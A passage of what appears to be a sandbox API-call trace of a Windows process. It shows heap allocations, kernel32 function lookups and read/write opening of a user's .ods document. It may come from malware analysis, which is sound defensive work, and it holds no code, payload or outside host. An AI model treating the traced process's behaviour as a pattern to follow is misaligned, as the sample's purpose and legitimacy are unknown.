lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.472] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0175.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0175.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0175.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3d) returned 0x8db0a8 [0175.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", cchWideChar=61, lpMultiByteStr=0x8db0a8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", lpUsedDefaultChar=0x0) returned 61 [0175.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0175.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.474] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\odo7bquezcp1nl2g.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0175.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0175.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7a) returned 0x9c0b78 [0175.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=61, lpWideCharStr=0x9c0b78, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods") returned 61 [0175.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0175.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0175.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0175.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0175.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0175.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0175.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0175.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0175.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.477] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.479] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0175.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0175.480] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0175.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0175.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0175.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0175.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0175.481] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.482] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0175.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd3a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0175.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.482] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0175.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0175.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0175.482] CloseHandle (hObject=0x138) returned 1 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0175.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0175.483] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.483] HeapFree (in: hHeap=0x8a0000, 